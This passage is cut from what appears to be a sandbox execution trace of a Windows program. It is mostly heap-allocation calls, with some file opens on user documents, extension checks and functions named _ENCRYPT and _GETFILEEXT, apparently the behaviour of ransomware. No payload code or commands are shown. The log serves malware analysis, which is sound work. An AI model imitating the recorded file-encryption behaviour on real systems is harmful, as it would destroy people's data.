(in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0033.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0033.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ds", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ods", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ods", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0033.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0033.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0033.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.626] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.626] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0033.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0033.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0033.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0033.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0033.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0033.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0033.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0033.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0033.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0033.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0033.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0033.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0033.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0033.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0033.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0033.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.627] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.627] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.627] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.627] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.627] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0033.627] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.627] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.627] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0033.627] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x1104, lpOverlapped=0x0) returned 1 [0033.628] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0033.628] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x1104, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.628] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0033.628] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0033.628] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0033.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0033.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0033.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0033.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0033.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0033.629] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0033.629] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.629] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.629] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0033.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.630] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.630] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0033.630] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.630] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\m6n9gns1e7rnh.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.630] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0033.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0033.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0033.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0033.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0033.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0033.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0033.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0033.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0033.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0033.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0033.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0033.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0033.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0033.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0033.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0033.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.631] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.631] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.631] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0033.631] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.631] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0033.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0033.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0033.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0033.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0033.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0033.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0033.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0033.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0033.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.632] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0033.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0033.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0033.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0033.632] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.632] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0033.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0033.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0033.632] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.632] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0033.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.632] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0033.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0033.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0033.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0033.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.633] HeapFree (in: 